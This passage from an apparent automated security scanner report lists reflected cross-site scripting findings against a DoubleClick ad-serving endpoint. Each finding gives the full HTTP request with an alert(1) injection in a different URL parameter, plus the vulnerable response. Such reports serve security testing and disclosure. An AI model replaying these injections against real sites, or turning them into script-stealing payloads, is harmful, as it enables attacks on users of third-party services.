User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:36:51 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5962

document.write('\n<script src=\"http://s
...[SNIP]...
r minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=31057270&AN=164797102512462"-alert(1)-"d89e665cac9&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/u%3B234423842%3B2-0%3B0%3B59000131%3B4307-300/250%3B39162019/39179806/1%3B%3B%7Efdr%
...[SNIP]...

3.52. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.37 [AN parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.37

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd733'-alert(1)-'7ff58ed8606 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.37;dcove=o;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=31057270&AN=1647971025fd733'-alert(1)-'7ff58ed8606&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=;ord=1647971025? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:36:55 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5950

document.write('\n<script src=\"http://s
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=31057270&AN=1647971025fd733'-alert(1)-'7ff58ed8606&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/d%3B234423842%3B0-0%3B0%3B59000131%3B4307-300/250%3B39161866/39179653/1%3B%3B%7Efdr%
...[SNIP]...

3.53. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.37 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.37

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d374b'-alert(1)-'d8cb4ce75bc was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.37;dcove=o;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262ed374b'-alert(1)-'d8cb4ce75bc&destination=;ord=1647971025? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:37:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5950

document.write('\n<script src=\"http://s
...[SNIP]...
get=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262ed374b'-alert(1)-'d8cb4ce75bc&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/d%3B234423842%3B0-0%3B0%3B59000131%3B4307-300/250%3B39161866/39179653/1%3B%3B%7Efdr%3D235152408%3B0-0%3B0%3B58999179%3B4307-300/250%
...[SNIP]...

3.54. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.37 [ASID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.37

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 96238"-alert(1)-"b7200d38222 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.37;dcove=o;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e96238"-alert(1)-"b7200d38222&destination=;ord=1647971025? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:37:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5879

document.write('\n<script src=\"http://s
...[SNIP]...
';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e96238"-alert(1)-"b7200d38222&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/c%3B234423842%3B3-0%3B0%3B59000131%3B4307-300/250%3B40029592/40047379/1%3B%3B%7Efdr%3D235152408%3B0-0%3B0%3B58999179%3B4307-300/250%
...[SNIP]...

3.55. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.37 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.37

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e73cc'-alert(1)-'b62fe7a90e1 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.37;dcove=o;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3e73cc'-alert(1)-'b62fe7a90e1&ASID=c0511e930eb34814af701040c549262e&destination=;ord=1647971025? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:37:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5879

document.write('\n<script src=\"http://s
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3e73cc'-alert(1)-'b62fe7a90e1&ASID=c0511e930eb34814af701040c549262e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/c%3B234423842%3B3-0%3B0%3B59000131%3B4307-300/250%3B40029592/40047379/1%3B%3B%7Efdr%3D23515240
...[SNIP]...

3.56. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.37 [PG parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.37

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 539de"-alert(1)-"38906822e42 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.37;dcove=o;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3539de"-alert(1)-"38906822e42&ASID=c0511e930eb34814af701040c549262e&destination=;ord=1647971025? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:36:59 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5959

document.write('\n<script src=\"http://s
...[SNIP]...
;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3539de"-alert(1)-"38906822e42&ASID=c0511e930eb34814af701040c549262e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/p%3B234423842%3B1-0%3B0%3B59000131%3B4307-300/250%3B39161955/39179742/1%3B%3B%7Efdr%3D23515240
...[SNIP]...

3.57. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.37 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.37

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bc362"-alert(1)-"4d6a6fc46bb was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.37;dcove=o;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=31057270bc362"-alert(1)-"4d6a6fc46bb&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=;ord=1647971025? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:36:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5959

document.write('\n<script src=\"http://s
...[SNIP]...
0x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=31057270bc362"-alert(1)-"4d6a6fc46bb&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/p%3B234423842%3B1-0%3B0%3B59000131%3B4307-300/250%3B39161955/39179742/
...[SNIP]...

3.58. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.37 [TargetID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.37

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f9ce'-alert(1)-'7f76266c16a was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.37;dcove=o;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=310572702f9ce'-alert(1)-'7f76266c16a&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=;ord=1647971025? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:36:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5950

document.write('\n<script src=\"http://s
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=310572702f9ce'-alert(1)-'7f76266c16a&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/d%3B234423842%3B0-0%3B0%3B59000131%3B4307-300/250%3B39161866/39179653/
...[SNIP]...

3.59. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.37 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.37

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19ce4"-alert(1)-"62b6c7524e2 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.37;dcove=o;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G19ce4"-alert(1)-"62b6c7524e2&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=;ord=1647971025? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:36:33 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5959

document.write('\n<script src=\"http://s
...[SNIP]...
_SmallBignofall_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G19ce4"-alert(1)-"62b6c7524e2&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/p%3B234423842%3B1-0%3B0%3B59000131%3B4307-300/250%3B
...[SNIP]...

3.60. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.37 [UIT parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.37

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8ccf2'-alert(1)-'12cd2169218 was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.37;dcove=o;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G8ccf2'-alert(1)-'12cd2169218&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=;ord=1647971025? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:36:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5962

document.write('\n<script src=\"http://s
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G8ccf2'-alert(1)-'12cd2169218&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/u%3B234423842%3B2-0%3B0%3B59000131%3B4307-300/250%3B
...[SNIP]...

3.61. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.37 [dcove parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.37

Issue detail

The value of the dcove request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13bbb'-alert(1)-'eb344aca53e was submitted in the dcove parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.37;dcove=o;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!13bbb'-alert(1)-'eb344aca53e&&PID=8280697&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=;ord=1647971025? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:36:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5962

document.write('\n<script src=\"http://s
...[SNIP]...
<a target=\"_blank\" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!13bbb'-alert(1)-'eb344aca53e&&PID=8280697&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/u%3B234423842%3B2-0%3B0%3B5900013
...[SNIP]...

3.62. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.37 [dcove parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.37

Issue detail

The value of the dcove request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12acc"-alert(1)-"17c3fff3af3 was submitted in the dcove parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.37;dcove=o;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!12acc"-alert(1)-"17c3fff3af3&&PID=8280697&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=;ord=1647971025? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Sun, 13 Feb 2011 14:36:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5846

document.write('\n<script src=\"http://s
...[SNIP]...
et/2010071/CHV_2011_Cruze_42mpgEco_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!12acc"-alert(1)-"17c3fff3af3&&PID=8280697&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=http://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/s%3B234423842%3B4-0%3B0%3B5900013
...[SNIP]...

3.63. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.37 [destination parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N3880.advertising.micros/B5109625.37

Issue detail

The value of the destination request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc01e'-alert(1)-'20643b8830b was submitted in the destination parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /adj/N3880.advertising.micros/B5109625.37;dcove=o;sz=300x250;dcopt=rcl;click0=http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=fc01e'-alert(1)-'20643b8830b HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2575106/466721/15017,2299144/808253/15017,1984865/715155/15016,1139856/660902/15016,2558160/1040396/15016,1359549/451737/15015,2206715/621812/15013,189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 5879
Cache-Control: no-cache
Pragma: no-cache
Date: Sun, 13 Feb 2011 14:37:20 GMT
Expires: Sun, 13 Feb 2011 14:37:20 GMT

document.write('\n<script src=\"http://s
...[SNIP]...
" href=\"http://wrapper.g.msn.com/GRedirect.aspx?g.msn.com/2AD0003R/27000000000037874.1?!&&PID=8280697&UIT=G&TargetID=31057270&AN=1647971025&PG=FTBHI3&ASID=c0511e930eb34814af701040c549262e&destination=fc01e'-alert(1)-'20643b8830bhttp://ad.doubleclick.net/click%3Bh%3Dv8/3aad/17/dc/%2a/c%3B234423842%3B3-0%3B0%3B59000131%3B4307-300/250%3B40029592/40047379/1%3B%3B%7Efdr%3D235152408%3B0-0%3B0%3B58999179%3B4307-300/250%3B40323569/40
...[SNIP]...

3.64. http://ad.doubleclick.net/adj/N3880.advertising.micros/B5109625.37 [destination parameter] previous next

Summary

Severity:	High
Confidence:	Certain
